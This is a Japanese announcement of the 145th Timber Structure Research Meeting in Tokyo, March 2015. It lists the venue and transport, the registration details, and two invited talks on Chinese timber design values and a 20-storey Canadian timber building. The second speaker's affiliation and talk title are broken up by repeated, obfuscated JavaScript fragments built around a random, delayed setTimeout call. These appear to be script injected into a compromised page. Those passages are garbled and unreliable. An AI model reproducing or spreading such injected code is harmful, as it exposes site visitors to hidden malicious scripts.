お知らせ

第145回木質構造研究会を開催いたします。

2015年2月27日

第145回木質構造研究会を下記の通り開催致しますので、宜しくご参集下さい。

今回は、国際木材学会大会(IAWPS 2015)が3月15-17日に東京で開催されるのに伴い来日される2名の先生に、木質構造研究会でもご講演頂くことに致しました。
中国の木造設計規範に絡んだ日本の木材輸出の可能性あるいはカナダにおける中高層建築の実現可能性と、現在の日本の木質構造分野にとっても重要な話題が聴講できるものと思われます。
会場は、国際会議会場の近く(江戸川区船堀)を確保しました。
最寄り駅からは若干遠いのですが、早咲きの桜が咲いていれば、道すがらお花見も兼ねて頂けるものと存じます。
皆様のお越しをお待ちしております。

日時:2015年3月17日(火) 17:00~18:30
場所:江戸川区新川さくら館
   住所:〒134-0091 江戸川区船堀7-15-12
   電話:03-3804-0314
    URL:http://www.sakurakan-edogawa.jp/
交通:電車利用の場合: 都営新宿線船堀駅より徒歩16分
バス利用の場合: 都営バス(錦25)「船堀七丁目」下車徒歩3分

講演予定者:
 ・○Haiqing Ren(任 海青)氏
 (中国林業科学研究院木材工業研究所 木材力学木構造研究室主任)
 講演タイトル「Design value of the compressive strength parallel to grain for  Larch 2×4 lumber based on a reliability analysis」
 任先生は、中国の木造設計規範の改正に関連して、日本産の木材(スギ、ヒノキ、カラマツ)が中国で使用可能かどうかを確認するための研究に携わっています。今回は、上記タイトルの講演に加えて、中国における木造建築事情についてもお話し頂く予定です。
 
 ・○Ying Hei Chui氏 
 (カナダ、New Brunswick大学Wood Science andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and Technology Centre教授)
 講演タイトル「Analysis andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and Design of a 20-Storey Timber Building」
 Chui先生は、カナダにおける様々な規格・基準の検討に携わっており、ISO TC165(木質構造)の委員でもあります。今回は、カナダで検討されている木造20階建てビルの概要をお話頂く予定です。

参加申込み:木質構造研究会宛のメールにて受付致します。
      2015年3月10日(火)までに info@jtes.org へご連絡ください。

事務局

〒113-8657 東京都文京区弥生1-1-1
 東京大学 大学院農学生命科学研究科 生物材料科学専攻 木質材料学研究室内
  TEL:03-5841-5253 FAX:03-5841-8198 E-mail:info@jtes.org